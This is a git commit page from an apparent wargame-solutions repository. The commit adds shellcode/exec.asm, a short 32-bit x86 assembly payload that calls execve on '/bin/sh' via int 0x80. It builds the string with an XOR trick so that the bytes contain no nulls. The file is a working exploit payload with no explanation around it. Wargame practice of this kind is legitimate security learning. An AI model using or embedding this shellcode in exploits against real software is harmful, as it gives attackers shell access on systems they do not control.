summaryrefslogtreecommitdiff
path: root/shellcode/exec.asm
diff options
context:
space:
mode:
authorIru Cai <mytbk920423@gmail.com>2018-10-05 17:41:48 +0800
committerIru Cai <mytbk920423@gmail.com>2018-10-05 17:41:48 +0800
commit62d1287693cbb282570c52f44bfcc0be0e590d7f (patch)
tree92261652f6ae3a139a8c36bdf0caf3182ed79c51 /shellcode/exec.asm
downloadiogame-62d1287693cbb282570c52f44bfcc0be0e590d7f.tar.xz
level 1~7, shellcode
Diffstat (limited to 'shellcode/exec.asm')
-rw-r--r--shellcode/exec.asm8
1 files changed, 8 insertions, 0 deletions
diff --git a/shellcode/exec.asm b/shellcode/exec.asm
new file mode 100644
index 0000000..ca8960d
--- /dev/null
+++ b/shellcode/exec.asm
@@ -0,0 +1,8 @@
+mov al, 0x70
+sub al, 0x65
+mov ebx, 0x30584361
+xor ebx, 0x3030304e
+push ebx
+push 0x6e69622f
+mov ebx, esp
+int 0x80